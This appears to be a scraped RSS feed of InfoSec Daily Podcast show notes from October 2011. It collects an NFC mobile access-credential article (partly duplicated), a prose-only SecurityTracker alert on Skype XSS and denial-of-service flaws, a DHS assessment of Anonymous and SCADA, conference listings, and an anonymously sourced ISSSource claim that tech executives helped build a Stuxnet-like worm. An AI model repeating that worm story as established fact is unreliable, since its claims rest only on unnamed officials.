<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another benefit is that the phone itself acts as another layer of security, explains Fonseca. For starters, each phone comes with an International Mobile Equipment Identity number. Since the IMEI is unique, it can be used to provide another identity aspect to the credential.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The secure element in the phone that stores the credential adds yet another level of security. &ldquo;You get the added benefits of those two aspects from the phone where you do have more real-time security,&rdquo; he says. &ldquo;And more real-time ability to re-commission cards to the phone over the air.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This dynamic nature of the mobile device will enable security postures to change in real time, says Tam Hulusi, senior vice president of strategic innovation and intellectual property for HID Global.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You can create a lot more powerful use cases of your access control scenario,&rdquo; Hulusi says. &ldquo;Dynamically you will be able to add one, two or three factor identification. If the threat level goes up or the context changes, you can change the number of factors accordingly in real time.&rdquo;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HID Global&rsquo;s iCLASS contactless cards are widely used in physical access and other applications. This fall the company will launch its first iCLASS emulation, enabling contactless credentials to be loaded onto NFC phones, Hulusi says.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HID will provide applications to enhance its mobile security offerings, adds Hulusi, including a virtual pin pad on the phone in lieu of traditional wall mounted devices. This will enable companies to provide two-factor authentication and eliminate the need for added hardware.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hulusi says the company is working on a future architecture in which the NFC chip is embedded in the door lock itself and the handset acts as a reader. In this mode, the standard key/lock relationship is essentially inverted; the key is already in the lock, it just needs the right phone to &ldquo;turn&rdquo; it.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Hulusi, it is similar to accessing information from NFC tags and posters, only in this case the tag is encrypted to ensure only authorized handsets can access the information.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So there seems to be plenty of projects on the horizon, but what will we have in the mean time? Fonseca says to expect a transition period during which we&rsquo;ll be carrying both our phones and smart cards as access devices.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;From an enterprise security standpoint, most (issuers) do not yet accept a virtual security credential as the only ID,&rdquo; Fonseca explains. &ldquo;There are ways on the phone to tie a photo to the credential, but that part hasn&rsquo;t been (completely) solved yet, so in the interim you&rsquo;ll likely have physical cards that are carrying the employee&rsquo;s credential and photo in case they don&rsquo;t have a phone. And then eventually the phone becomes the redemption vehicle for everything.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.secureidnews.com/2011/10/17/keying-in-to-nfc"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.secureidnews.com/2011/10/17/keying-in-to-nfc</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Say &ldquo;mobile wallet&rdquo; and most people think payment&ndash;tapping your phone against a reader instead of swiping a card. But the phrase may soon come to encompass not just your credit card, but your entire wallet: loyalty cards, work ID, access credentials and all&ndash;and potentially even the keys jingling in your pocket.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since NFC uses the same standard as contactless smart cards, the technology could enable employers to take existing smart ID cards that are used to get into the office and transfer it over to the phone&ndash;a process called &ldquo;card emulation.&rdquo; Making this a reality, however, is not as easy as it sounds, explains to Jeff Fonseca, director of business development and sales at NXP Semiconductors.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s not like you can just take somebody&rsquo;s badge and put it on a phone and have it just work everywhere,&rdquo; says Fonseca. &ldquo;It doesn&rsquo;t work that way.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The market is split with different companies providing different &ldquo;flavors&rdquo; of contactless technologies in different parts of the world. According to Fonseca, this makes interoperability a big hurdle.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agreements need to be in place to replicate card types, cryptography and unique IDs to NFC devices. Credential vendors such as NXP, HID Global, LEGIC and Sony will need to authorize one or more parts of the mobile chain&ndash;the NFC chip, the handset, the mobile operator&ndash;to enable card emulation.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You can&rsquo;t just copy the credentials and (use) a different unique ID &hellip; it won&rsquo;t work,&rdquo; Fonseca says. &ldquo;You have to have a commercial agreement with the enterprise to replicate and make those credentials virtual onto the phone.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These obstacles, though relevant, are less daunting for real world physical access systems than for a future globally interoperable vision. Most organizations select a single type of contactless credential to issue to employees. There may also be a preferred mobile operator and handset. Thus it is not a requirement that every flavor of contactless credential be approved for all handsets to have a working solution.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Making all this work together will not fall to the issuing organizations. Rather, contactless providers will work with the mobile chain to offer solutions to issuers. In the near term, it is likely that the contactless provider will have one or more approved handsets and/or mobile operators that issuers can opt to deploy. It is likely that the current network of system integrators that provides hardware and cards to issuers will offer these new emulated NFC cards as a future option.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To be clear, this work is ongoing and it is true that there are very few NFC-enabled handsets on the market today. But these limitations are temporary, according to Fonseca. &ldquo;The industry is moving in this direction,&rdquo; he says, adding that there are significant benefits to justify the switch to mobile.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unlike plastic cards, which are static, a mobile phone can be constantly updated with new permissions and apps for changing needs. Because NFC-equipped handsets can be updated dynamically over the air, new credentials can be provisioned without requiring the employee to physically visit company security or human resources.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another benefit is that the phone itself acts as another layer of security, explains Fonseca. For starters, each phone comes with an International Mobile Equipment Identity number. Since the IMEI is unique, it can be used to provide another identity aspect to the credential.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The secure element in the phone that stores the credential adds yet another level of security. &ldquo;You get the added benefits of those two aspects from the phone where you do have more real-time security,&rdquo; he says. &ldquo;And more real-time ability to re-commission cards to the phone over the air.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This dynamic nature of the mobile device will enable security postures to change in real time, says Tam Hulusi, senior vice president of strategic innovation and intellectual property for HID Global.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You can create a lot more powerful use cases of your access control scenario,&rdquo; Hulusi says. &ldquo;Dynamically you will be able to add one, two or three factor identification. If the threat level goes up or the context changes, you can change the number of factors accordingly in real time.&rdquo;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HID Global&rsquo;s iCLASS contactless cards are widely used in physical access and other applications. This fall the company will launch its first iCLASS emulation, enabling contactless credentials to be loaded onto NFC phones, Hulusi says.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HID will provide applications to enhance its mobile security offerings, adds Hulusi, including a virtual pin pad on the phone in lieu of traditional wall mounted devices. This will enable companies to provide two-factor authentication and eliminate the need for added hardware.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hulusi says the company is working on a future architecture in which the NFC chip is embedded in the door lock itself and the handset acts as a reader. In this mode, the standard key/lock relationship is essentially inverted; the key is already in the lock, it just needs the right phone to &ldquo;turn&rdquo; it.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Hulusi, it is similar to accessing information from NFC tags and posters, only in this case the tag is encrypted to ensure only authorized handsets can access the information.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So there seems to be plenty of projects on the horizon, but what will we have in the mean time? Fonseca says to expect a transition period during which we&rsquo;ll be carrying both our phones and smart cards as access devices.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securitytracker.com/id/1026196"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">www.securitytracker.com/id/1026196</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype Bugs Permit Cross-Site Scripting and Denial of Service Attacks</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SecurityTracker Alert ID: &nbsp;1026196 <br class="kix-line-break" /><br />
	SecurityTracker URL: &nbsp;http://securitytracker.com/id/1026196 <br class="kix-line-break" /><br />
	CVE Reference: &nbsp;</span><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&nbsp;GENERIC-MAP-NOMATCH</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;(Links to External Site) <br class="kix-line-break" /><br />
	Date: &nbsp;Oct 18 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Version(s): 5.2.x, 5.3.x</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Description: &nbsp;&nbsp;Several vulnerabilities were reported in Skype. A remote user can cause denial of service conditions. A remote user can conduct cross-site scripting attacks. A remote user may be able to execute arbitrary code on the target system.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several parameters do not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user&#39;s browser. The code will originate from the site running the Skype software and will run in the security context of that site. As a result, the code will be able to access the target user&#39;s cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A remote user can send specially crafted data to cause the target user&#39;s client to crash.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A remote user can send specially crafted data to trigger a memory corruption error and potentially execute arbitrary code on the target user&#39;s system.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The original advisory (presented at HITBSecConf) is available at:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://www.vulnerability-lab.com/get_content.php?id=293</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Benjamin Kunz Mejri (Rem0ve) and Pim J.F. Campers (X4lt) of Vulnerability Research Laboratory reported these vulnerabilities.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Impact: &nbsp;&nbsp;A remote user can cause denial of service conditions.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.eweek.com/c/a/Security/Anonymous-Cant-Attack-SCADA-Systems-Now-But-May-Do-So-in-Future-DHS-546618"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Security/Anonymous-Cant-Attack-SCADA-Systems-Now-But-May-Do-So-in-Future-DHS-546618</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Department of Homeland Security has evaluated Anonymous and found that while the collective currently may not be able to take over critical IT infrastructure today, they may be able to someday.&nbsp;&nbsp;&nbsp; &nbsp;The &ldquo;hacktivist&rdquo; collective Anonymous is capable of crippling critical infrastructure, but the odds of developing a Stuxnet-style attack on industrial Supervisory Control and Data Acquisition (SCADA) systems were slim, according to a Department of Homeland Security bulletin.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The four-page report from the department&#39;s National Cyber-Security and Communications Integration Center was posted on the Public Intelligence Website on Oct. 17. The Department of Homeland Security evaluated the collective&#39;s potential to disrupt critical infrastructure in the &quot;Assessment of Anonymous Threat to Control Systems&quot; report, dated Sept. 17.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even though hacktivist groups are increasingly more active in their attacks, DHS said actual threats to control systems don&#39;t seem to have increased. Anonymous currently has a &quot;limited ability&quot; to conduct attacks that target industrial control systems, the DHS found. The group has the capability to disrupt operations with distributed denial of service attacks, but it doesn&#39;t currently have the necessary skills to take over critical infrastructure, according to the DHS.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;However, experienced and skilled members of Anonymous&hellip;could be able to develop capabilities to gain access and trespass on control system networks very quickly,&quot; according to the DHS bulletin.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DHS evaluated the group after a known Anonymous member posted on Twitter on July 19 a directory tree for Siemens SIMATIC control system software, according to the report. &quot;This is an indication in a shift toward interest in control systems by the hacktivist group,&quot; the report said.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Critical infrastructure refers to the systems and networks that power communications, energy, financial systems, food, government operations, health care systems, transportation and water.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-497-stuxnet-ng-backseat-iron-mountain-holding-an-id-hostage-nfc-entry-skype-0-day-anonymous-scada/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2980/0/infosec-daily-podcast-episode-497.mp3" length="19256360" type="audio/mpeg" />
		<itunes:duration>0:40:04</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 497 for October 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 497 for October 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.isssource.com/a-new-and-frightening-stuxnet/
	Facing mounting concern about Iran&#8217;s nuclear program, a top U.S. and Israeli technical team has developed a computer &#8220;malworm&#8221; designed to take down all of Iran&#8217;s computer software.
	ISSSource has learned leaders of the three major software companies, Sergey Brin at Google, Steve Ballmer at Microsoft and Larry Ellison at Oracle have been working with Israel&#8217;s top cyber warriors and have now come up with new version of a Stuxnet-like worm that can bring down Iran&#8217;s entire software networks if the Iranian regime gets too close to a breakout, according to U.S. intelligence sources. Google, Microsoft and Oracle had no comment on the issue.
	&#8220;Cyber warfare is a lot like biological warfare. It&#8217;s hard to stop. It&#8217;s uncontrollable. It can bite you in the ass,&#8221; said one U.S. official.
	This new version of Stuxnet was, until recently, seen as a tool to derail any notions of an Israel military surgical strike on Iran with the United States in a supporting role. During his visit to Israel, Secretary of Defense Leon Panetta carried a U.S. message to Tel Aviv that President Barack Obama would not support a military strike on Iran, said a U.S. official, who spoke under the condition of anonymity. Israeli plans for an attack had alarmed the National Security Council and the Senate foreign policy committee when briefed on the Israeli proposal.
	&#8220;They were in shock afterwards,&#8221; the U.S. official said.
	Since early June, U.S. intelligence experts have warned of an Israeli attack on Iran before the UN meeting on the question of Palestinian statehood. Those warnings came at the same time as when then Secretary of Defense Robert Gates left office in June or when Joint Chiefs of Staff head Adm. Mike Mullen was prep[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 496 &#8211;  Dave’s New Tool &amp; Scot Terban Interview</title>
		<link>http://www.isdpodcast.com/episode-496-dave%e2%80%99s-new-tool-scot-terban-interview</link>
		<comments>http://www.isdpodcast.com/episode-496-dave%e2%80%99s-new-tool-scot-terban-interview#comments</comments>
		<pubDate>Tue, 18 Oct 2011 01:02:01 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2972</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 496 for October 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma Special Guest: Scot Terban Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 496 for October 17, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest: Scot Terban</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
